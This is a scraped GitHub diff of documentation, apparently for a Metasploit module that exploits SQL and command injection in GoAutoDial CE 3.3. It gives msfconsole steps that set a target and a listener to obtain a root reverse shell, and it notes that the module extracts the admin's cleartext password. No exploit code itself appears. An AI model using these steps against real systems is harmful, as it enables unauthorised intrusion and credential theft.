You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database.
3
4
4
5
## Affected software
6
+
5
7
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
6
8
Refer to: https://www.exploit-db.com/exploits/36807/
7
9
8
10
## Verification
9
-
List the steps needed to make sure this thing works
10
11
11
12
- Start `msfconsole`
12
13
- Do `use exploit/linux/http/goautodial_3_rce_command_injection`
13
-
- Do `set payload cmd/unix/reverse_bash`
14
14
- Do `set RHOST <IP>`
15
15
- Do `set LHOST <IP>`
16
16
- Do `set LPORT <PORT>`
17
+
- Do `run`
17
18
- Wait for shell
19
+
20
+
## Scenarios
21
+
18
22
```
23
+
msf > use exploit/linux/http/goautodial_3_rce_command_injection
24
+
msf exploit(goautodial_3_rce_command_injection) > set rhost 172.16.191.150
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges.
17
+
18
+
This module has been tested successfully on GoAutoDial version 3.3-1406088000.
0 commit comments